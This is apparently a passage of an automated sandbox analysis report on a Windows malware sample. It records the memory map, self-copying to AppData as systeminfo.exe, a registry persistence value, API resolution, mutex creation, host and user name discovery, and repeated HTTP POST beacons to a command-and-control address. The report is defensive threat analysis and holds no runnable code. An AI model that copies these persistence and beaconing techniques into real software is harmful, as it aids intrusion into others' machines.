msctf.dll 0x76370000 0x7643bfff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x76440000 0x764cefff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x764d0000 0x7655ffff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x76700000 0x76745fff Memory Mapped File Readable, Writable, Executable False False False
urlmon.dll 0x76750000 0x76885fff Memory Mapped File Readable, Writable, Executable False False False
iertutil.dll 0x76890000 0x76a8afff Memory Mapped File Readable, Writable, Executable False False False
ws2_32.dll 0x76ac0000 0x76af4fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x76b00000 0x76babfff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x76bb0000 0x76bc8fff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000076bd0000 0x76bd0000 0x76cc9fff Private Memory Readable, Writable, Executable True False False
private_0x0000000076cd0000 0x76cd0000 0x76deefff Private Memory Readable, Writable, Executable True False False
ntdll.dll 0x76df0000 0x76f98fff Memory Mapped File Readable, Writable, Executable False False False
nsi.dll 0x76fa0000 0x76fa5fff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x76fd0000 0x7714ffff Memory Mapped File Readable, Writable, Executable False False False
private_0x000000007efa1000 0x7efa1000 0x7efa3fff Private Memory Readable, Writable True False False
private_0x000000007efa4000 0x7efa4000 0x7efa6fff Private Memory Readable, Writable True False False
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
For performance reasons, the remaining 6 entries are omitted.
The remaining entries can be found in flog.txt.
Host Behavior
File (2)
+
Operation Filename Additional Information Success Count Logfile
Create C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe type = size True 1
Fn
Registry (5)
+
Operation Key Additional Information Success Count Logfile
Write Value - value_name = systeminfo, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe", size = 134, type = REG_SZ True 5
Fn
Module (47)
+
Operation Module Additional Information Success Count Logfile
Load msvcrt.dll base_address = 0x76b00000 True 1
Fn
Load KERNEL32.dll base_address = 0x74e30000 True 1
Fn
Load USER32.dll base_address = 0x75040000 True 1
Fn
Load ADVAPI32.dll base_address = 0x74d90000 True 1
Fn
Get Filename - process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260 True 6
Fn
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x20fa6c True 1
Fn
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x20faa4 True 1
Fn
Get Address - function = LoadLibraryA, ordinal = 0, address_out = 0x20fb14 True 1
Fn
Get Address - function = UnmapViewOfFile, ordinal = 0, address_out = 0x20fb14 True 1
Fn
Get Address - function = GetProcAddress, ordinal = 0, address_out = 0x20fb14 True 1
Fn
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x20fb14 True 1
Fn
Get Address - function = VirtualProtect, ordinal = 0, address_out = 0x20fb14 True 1
Fn
Get Address - function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x20fb14 True 1
Fn
Get Address - function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x20fb14 True 1
Fn
Get Address c:\windows\syswow64\msvcrt.dll function = strchr, address_out = 0x76b0dbeb True 1
Fn
Get Address c:\windows\syswow64\msvcrt.dll function = free, address_out = 0x76b09894 True 1
Fn
Get Address c:\windows\syswow64\msvcrt.dll function = malloc, address_out = 0x76b09cee True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeConsole, address_out = 0x74ee6aa8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x74e41700 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatW, address_out = 0x74e6828e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x74e44435 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpW, address_out = 0x74e45929 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x74e63102 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x74e454ee True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x74e44442 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x74e41245 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x74e414b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameA, address_out = 0x74e5b6e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameExA, address_out = 0x74ec42ef True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x74e45a4b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpA, address_out = 0x74e5eceb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x74e411c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x74e414e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x76ffe026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x74e414c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x74e411a9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x74e41809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x74e411f8 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = wsprintfA, address_out = 0x7506ae5f True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetUserNameA, address_out = 0x74dba4b4 True 1
Fn
Create Mapping C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Map C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, desired_access = FILE_MAP_READ True 1
Fn
Service (1)
+
Operation Additional Information Success Count Logfile
Open Manager database_name = SERVICES_ACTIVE_DATABASE False 1
Fn
System (34)
+
Operation Additional Information Success Count Logfile
Get Computer Name result_out = YKYD69Q True 2
Fn
Get Computer Name result_out = YKyd69q, type = ComputerNameDnsHostname True 1
Fn
Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
Get Time type = Local Time, time = 2017-11-28 18:19:49 (Local Time) True 6
Fn
Get Time type = Ticks, time = 21902 True 1
Fn
Get Time type = Ticks, time = 21918 True 3
Fn
Get Time type = Ticks, time = 23790 True 1
Fn
Get Time type = Ticks, time = 28875 True 1
Fn
Get Time type = Ticks, time = 29796 True 1
Fn
Get Time type = Ticks, time = 30794 True 1
Fn
Get Time type = Ticks, time = 31793 True 1
Fn
Get Time type = Ticks, time = 32791 True 1
Fn
Get Time type = Ticks, time = 33789 True 1
Fn
Get Time type = Ticks, time = 34803 True 1
Fn
Get Time type = Ticks, time = 35802 True 1
Fn
Get Time type = Ticks, time = 36800 True 1
Fn
Get Time type = Ticks, time = 37799 True 1
Fn
Get Time type = Ticks, time = 38797 True 1
Fn
Get Time type = Ticks, time = 39795 True 1
Fn
Get Info type = Operating System False 1
Fn
Get Info type = Hardware Information True 6
Fn
Mutex (9)
+
Operation Additional Information Success Count Logfile
Create mutex_name = Global\I705BA84C True 1
Fn
Create mutex_name = Global\M705BA84C True 1
Fn
Open mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE False 6
Fn
Release mutex_name = Global\I705BA84C True 1
Fn
Network Behavior
HTTP Sessions (6)
+
Information Value
Total Data Sent 1.94 KB (1986 bytes)
Total Data Received 0.76 KB (780 bytes)
Contacted Host Count 1
Contacted Hosts 173.201.20.6
HTTP Session #1
+
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session - True 5
Fn
HTTP Session #2
+
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session - True 5
Fn
HTTP Session #3
+
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session - True 5
Fn
HTTP Session #4
+
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session - True 5
Fn
HTTP Session #5
+
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session - True 5
Fn
HTTP Session #6
+
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 0.00 KB (0 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 False 1
Fn
Function Logfile
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Screenshot
Expand-Icon
Exit-Icon
icon_left
icon_left
image